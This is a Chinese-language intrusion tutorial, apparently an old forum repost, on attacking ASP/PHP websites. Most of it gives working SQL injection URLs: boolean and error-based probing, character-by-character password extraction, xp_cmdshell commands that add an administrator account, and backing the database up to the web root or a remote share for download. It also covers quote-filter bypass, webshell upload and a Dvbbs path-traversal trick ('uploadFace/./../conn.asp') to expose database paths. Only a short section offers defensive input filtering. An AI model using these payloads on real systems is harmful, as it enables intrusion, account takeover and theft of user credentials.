简易入侵流程

<!--StartFragment-->一，网站方面；
    1 对于SQL主入是所有采用ASP和PHP的WEB服务器一个入侵方法，关键是由于在
原代码的查询部分也就是网站提供用户输入的地方，对参数缺少过滤，以至黑客可以
构造SQL查询语句得到管理员或者系统的敏感信息，进而参透到系统里。
     例子：ASP的
    在www.sxj.com/sxj.asp?id=2后面加一个单引号‘，如果出现id=2'出有未闭合
的’，很明显有漏洞，没有过滤单引号，但是有的网站，不一定每台服务器的IIS都
返回具体错误提示给客户端，如果程序中加了cint(参数)之类语句的话，ＳＱＬ注入
是不会成功的，但服务器同样会报错，具体提示信息为处理 URL 时服务器上出错。
请和系统管理员联络。

其次，部分对ＳＱＬ注入有一点了解的程序员，认为只要把单引号过滤掉就安全了，
这种情况不为少数，如果你用单引号测试，是测不到注入点的

那么，什么样的测试方法才是比较准确呢？答案如下：

① http://www.sxj.com/sxj.asp?id=2
② http://www.sxj.com/sxj.asp?id=2 and 1=1
③ http://www.sxj.com/sxj.asp?id=2 and 1=2
如果1和2返回的是正常的页面，而且3返回的是错误的页面的话，那么说明该网站
存在主入点，接下来就是具体的主入了：
首先，提交www.sxj.com/sxj.asp?id=2 and 1<>(select id from users) 判断是
否有一个叫users的用户表存在，如果存在进一步www.sxj.com/sxj.asp?id=2 and
1<>(select id from users where username>0)可以判断是否存在一个字段是user
name的列，如果存在可以 www.sxj.com/sxj.asp?id=2 and 1<>(select id from users
where password>0)可以判断是否一个字段是password的表列，好了，现在可以猜测
用户名和密码了，一般用户名是可以从网站得知的，所以我从密码的长度入手，
www.sxj.com/sxj.asp?id=2 and 1<>(select id from users where len(password)
>N（N为一个你自定义的一个数值）最好结合大于>和小于<一起集合使用提高效率
如果知道了密码长度为8位，接下来www.sxj.com/sxj.asp?id=2 and 1<>(select id
from users where username='cookie' and left(password,1)='任意的字符包括数字')
一个一个的尝试，当www.sxj.com/sxj.asp?id=2 and 1<>(select id from users
where username='cookie' and left(password,1)='a')页面返回正常，说明密码的
第一位是a,接下来的就不写了同理！
   最后就是登陆，如果猜测的是管理员的密码，还的找见管理员登陆的页面，然后
进入后台，找是否有上传的地方，上传WEBSHELL，提升权限，因为此时是GUEST权限
后者可以该用户注册信息为WEB木马，效果是一样的，或者改上传文件的类型，
以上的操作是网站没有禁止FSO（file system object)，其他的方法我还不知道呀
郁闷！
                     判断数据库类型和数据库用户名及注入方法

不同的数据库的函数、注入方法都是有差异的，所以在注入之前，我们还要判断一下
数据库的类型。一般ASP最常搭配的数据库是Access和SQLServer，网上超过99%的网站
都是其中之一。怎么让程序告诉你它使用的什么数据库呢？来看看：

SQLServer有一些系统变量，如果服务器IIS提示没关闭，并且SQLServer返回错误提示
的话，那可以直接从出错信息获取，方法如下：

http://www.19cn.com/showdetail.asp?id=49 and user>0

这句语句很简单，但却包含了SQLServer特有注入方法的精髓，我自己也是在一次无意的
测试中发现这种效率极高的猜解方法。让我看来看看它的含义：首先，前面的语句是正常
的，重点在and user>0，我们知道，user是SQLServer的一个内置变量，它的值是当前连接
的用户名，类型为nvarchar。拿一个nvarchar的值跟int的数0比较，系统会先试图将nvarch
ar的值转成int型，当然，转的过程中肯定会出错，SQLServer的出错提示是：将nvarchar值
”abc” 转换数据类型为 int 的列时发生语法错误，呵呵，abc正是变量user的值，这样，
不废吹灰之力就拿到了数据库的用户名。在以后的篇幅里，大家会看到很多用这种方法的语
句。

顺便说几句，众所周知，SQLServer的用户sa是个等同Adminstrators权限的角色，拿到了sa
权限，几乎肯定可以拿到主机的Administrator了。上面的方法可以很方便的测试出是否是用
sa登录，要注意的是：如果是sa登录，提示是将”dbo”转换成int的列发生错误，而不是”sa”。

如果服务器IIS不允许返回错误提示，那怎么判断数据库类型呢？我们可以从Access和SQLServ
er和区别入手，Access和SQLServer都有自己的系统表，比如存放数据库中所有对象的表，Acce
ss是在系统表[msysobjects]中，但在Web环境下读该表会提示“没有权限”，SQLServer是在表
[sysobjects]中，在Web环境下可正常读取。

在确认可以注入的情况下，使用下面的语句：

http://www.19cn.com/showdetail.asp?id=49 and (select count(*) from sysobjects)>0
http://www.19cn.com/showdetail.asp?id=49 and (select count(*) from msysobjects)>0

如果数据库是SQLServer，那么第一个网址的页面与原页面http://www.19cn.com/showdetail.asp
?id=49是大致相同的；而第二个网址，由于找不到表msysobjects，会提示出错，就算程序有容错
处理，页面也与原页面完全不同。

如果数据库用的是Access，那么情况就有所不同，第一个网址的页面与原页面完全不同；第二个网
址，则视乎数据库设置是否允许读该系统表，一般来说是不允许的，所以与原网址也是完全不同。
大多数情况下，用第一个网址就可以得知系统所用的数据库类型，第二个网址只作为开启IIS错误提
示时的验证
   另外在判断密码长度和用户名时，如果密码用户名是汉字，那么前面的left就不好用了，所以我
使用了ASC(MID(PASSWORD),1,1)来判断第二个参数是password的启始位，第三个参数是指个数一般为
1，这样得到是ASC码值最后可以对照ASC码表找出密码的值
                          SQL注入常用函数

有SQL语言基础的人，在SQL注入的时候成功率比不熟悉的人高很多。我们有必要提高一下自己的SQL水
平，特别是一些常用的函数及命令。

Access：asc(字符) SQLServer：unicode(字符)
作用：返回某字符的ASCII码

Access：chr(数字) SQLServer：nchar(数字)
作用：与asc相反，根据ASCII码返回字符

Access：mid(字符串,N,L) SQLServer：substring(字符串,N,L)
作用：返回字符串从N个字符起长度为L的子字符串，即N到N+L之间的字符串

Access：abc(数字) SQLServer：abc (数字)
作用：返回数字的绝对值（在猜解汉字的时候会用到）

Access：A between B And C SQLServer：A between B And C
作用：判断A是否界于B与C之间

第三节、中文处理方法

在注入中碰到中文字符是常有的事，有些人一碰到中文字符就想打退堂鼓了。其实只要对中文的编码有
所了解，“中文恐惧症”很快可以克服。

先说一点常识：

Access中，中文的ASCII码可能会出现负数，取出该负数后用abs()取绝对值，汉字字符不变。

SQLServer中，中文的ASCII为正数，但由于是UNICODE的双位编码，不能用函数ascii()取得ASCII码，必
须用函数unicode ()返回unicode值，再用nchar函数取得对应的中文字符。
第二部分，利用系统表主入SQLServer数据库
      SQLServer是一个功能强大的数据库系统，与操作系统也有紧密的联系，这
给开发者带来很大的方便，但另一方面，也为主入者提供一个跳板，我们先来看看
几个具体的例子：
1 http://site/usl.asp?id=1;exec master..xp_cmdshell "net user cookie pas
sword /add"--
2 http://site/usl.asp?id=1;exec master..xp_cmdshell "net localgroup adminis
trators cookie /add"
    分号；在SQLServer中表示阁开前后两句，--表示后面的语句为注释，所以，
这句在SQLServer中将被分成两句执行，先是Select出ID=1的记录，然后执行存储
过程xp_cmdshell,这个存储过程用于凋用系统命令，于是，用net命令新建立了
用户名为name,密码为password的windows的帐号。
3 http://site/usl.asp?id=1;;and db_name()>0
前面有个类似的例子and user>0,作用是获取连接用户名，db_name()是另一个系统
变量，返回的是连接的数据库名。
4 http://site/usl.asp?id=1;backup database 数据库名 to disk='c:/inetpub/
wwwroot/1.db';--
这是相当狠的一招从3拿到的数据库名，加上某些IIS出错暴露出的绝对路径，将
数据库备份到WEB目录下面，再用HTTP把整个数据库就完完整整的下载回来，所有的
管理员及用户密码都一览无疑！在不知道绝对路径的时候，还可以备份到网络地址
的方法（如//218.27.87.150/share/1.db),但成功率不高。
5 http://site/url.asp?id=1;;and (select Top 1 name from sysobjects where
xtype='U' and status>o)>0
前面说过，sysobjects是SQLServer的系统表，存储着所有的,
视图，约束及其他对象，xtype='U' and status>0，表示用户建立的表名，上面的
语句将第一个表名取出，与0比较大小，让报错信息把表名暴露出来。第二，第三
个表怎么获取？
6 http://site/url.asp?id=1;;and (select top 1 col_name(object_id('表名
’),1) from systemobjects)>0
从5拿到的表名的第一个字段名，将1换成2，3，4...就可以逐个获取所猜测里面的字
段名。
    第二节、绕过程序限制继续注入

在入门篇提到，有很多人喜欢用’号测试注入漏洞，所以也有很多人用过滤’号的方
法来“防止”注入漏洞，这也许能挡住一些入门者的攻击，但对ＳＱＬ注入比较熟悉
的人，还是可以利用相关的函数，达到绕过程序限制的目的。

在“ＳＱＬ注入的一般步骤”一节中，我所用的语句，都是经过我优化，让其不包含
有单引号的；在“利用系统表注入SQLServer数据库”中，有些语句包含有’号，我们
举个例子来看看怎么改造这些语句：

简单的如where xtype=’U’，字符U对应的ASCII码是85，所以可以用where xtype=
char(85)代替；如果字符是中文的，比如where name=’用户’，可以用where name=
nchar(29992)+nchar(25143)代替。

防 范 方 法

ＳＱＬ注入漏洞可谓是“千里之堤，溃于蚁穴”，这种漏洞在网上极为普遍，通常是由
于程序员对注入不了解，或者程序过滤不严格，或者某个参数忘记检查导致。在这里，
我给大家一个函数，代替ASP中的Request函数，可以对一切的SQL注入Say NO，函数如下：

 

Function SafeRequest(ParaName,ParaType)
       '--- 传入参数 ---
       'ParaName:参数名称-字符型
       'ParaType:参数类型-数字型(1表示以上参数是数字，0表示以上参数为字符)

       Dim ParaValue
       ParaValue=Request(ParaName)
       If ParaType=1 then
              If not isNumeric(ParaValue) then
                     Response.write "参数" & ParaName & "必须为数字型！"
                     Response.end
              End if
       Else
              ParaValue=replace(ParaValue,"'","''")
       End if
       SafeRequest=ParaValue
End function

2 暴网站数据库的方法
1 动力文章系统
   1）漏洞介绍：由于数据库连接文件INC/conn.asp和数据库文件database/123.mdb都放
在同级目录ACCESS下
而且他们都用的是相对路径，用网站自带的编辑页
<FORM name=Login onsubmit="return CheckForm();" action=http://www.target.com/inc
/conn.asp method
=post target=_parent> <TABLE cellSpacing=0 cellPadding=0 width=585 align=center
border=0>
提交后数据库的路径就会出来了：]

Microsoft JET Database Engine 错误 '80004005'

'E:/My/ACCESS/inc/database/adsfkldfogowerjnokfdslwejhdfsjhk.mdb'不是一个有效的路径
。 确定路径名称
拼写是否正确，以及是否连接到文件存放的服务器。

/inc/conn.asp，行9 文章引用了http://www.hackerxfiles.net/bbs/dispbbs.asp?boardID=4&
ID=27293
http://www.xfocus.net/articles/200402/662.html
   2 动网论坛
   2）漏洞介绍：方法是源于动力文章系统暴库，因为动网论坛的conn.asp文件和数据库的文件
夹在同一个目录
下，所以如果把conn.asp文件转移到调用他的文件的上级目录，而且是相对路径就可以暴库]
所以想到了前段时间发现的动网论坛可以转移文件的漏洞，漏洞的内容是，在用户修改资料里的
，他对用户自定义
头像地址过滤不严，导致用户通过构造跳转路径，使conn.asp文件转移到上级目录，
漏洞源代码：
'******************
'对上传头象进行过滤与改名
if Cint(Forum_Setting(7))=1 then
on error resume next
    dim objFSO,upfilename,newfilename
    dim upface,memberid
    set rs=conn.execute("select userid,face from [user] where userid="&userid)
    memberid=rs(0)
    upface=trim(rs(1))
    newfilename=""
upfilename=split(upface,"/")
if ubound(upfilename)=1 and upfilename(0)="uploadFace" then
if instr(upfilename(1),"_")=0 then
        newfilename="uploadFace/"&memberid&"_"&upfilename(1)           /用户定义的头像
变为uploadFace/用户ID
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
if objFSO.fileExists(Server.MapPath(upface)) then
objFSO.movefile ""&Server.MapPath(upface)&"",""&Server.MapPath(newfilename)&""
end if
If Err.Number = 0 Then
conn.execute("update [user] set face='"&newfilename&"' where userid="&userid)
end if
set objFSO=nothing
end if
end if
rs.close
set rs=nothing
end if
'对上传头象进行过滤与改名结束
'****************

　　看看这句：

newfilename="uploadFace/"&memberid&"_"&upfilename(1)   /newfilename=用户定义的
头像变为uploadFace/用户ID_upfilen
ame的另一部分

再看：

if objFSO.fileExists(Server.MapPath(upface)) then
objFSO.movefile ""&Server.MapPath(upface)&"",""&Server.MapPath(newfilename)&""
/看见没有？最关键的部分来了，如果检测到upface代表的文件存在，则对改文件进行移动并改名！
相信大家都在那里把/、/、.和..的作用了解了吧。呵呵，下面我们要做的就是跳转目录把conn.asp
转移过来。在自定义头像地址那里添上这样的一句：

uploadFace/./../conn.asp （注意大小写）
　　前面已经分析过代码了，这句话的意思应该看的懂了吧，我们把“头像”地址指向了上级目录的
conn.asp。由于符合它的判断条件upface存在，所以它就会把conn.asp这个文件转移到uploadFace这
个目录来，这样就符合我们玩动力文章系统的时候的第一个条件了。一般大家用的都是相对路径，所
以下面我们只要调用这个文件就会知道数据库路径。新建一个HTML文件写上如下内容：

<IFRAME marginWidth=0 marginHeight=0 src="http://www.target.com/dvbbs/uploadFace/conn.asp
" frameBorder=0 width=500 scrolling=noshade height=400></IFRAME>
安全篇

　　看来问题都出在conn.asp本身，不打自招。为了安全我们得好好处理一下它。

　　最笨的方法就是把它改名了，让别人猜不到路径。但是它要被很多文件调用，还得改其它地方。

　　我们用相对路径的时候，数据库路径会随着调用conn.asp的文件而改变，从而产生了错误。那么我
们就让连接数据库使用绝对路径，这样一来不管谁调用conn.asp数据库路径都不变了。

　　我在测试动网这个漏洞的时候，发现对一些比较新的版本，就是文件挪移成功了也暴不出数据库路
径。但是有的6.0版本有效。看来新的版本动网论坛对conn.asp进行了特殊的处理。对比了一下两个不同
的conn.asp，发现新的conn.asp里加了这么一句：

On Error Resume Next

　　这样一来，就是出错了不提示数据库信息，打死了也不招！当然以上的那些方法结合起来使用就更好了
3 利用IE漏洞暴库，一般的网站路径是http://www.sxj.com/sxj.asp
是/，我们知道/ 和/其实是一样的都能对路径起跳转作用，但是/的UNICODE是%5c当提交时，IE无法正常解析
导致暴库，但是一般的错误返回页面是本地IE提供的，所以我门先的关了本地的错误页面，具体在菜单项的‘
工具->internet选项->高级->显示HTTP友好页面（把前面的对号去掉）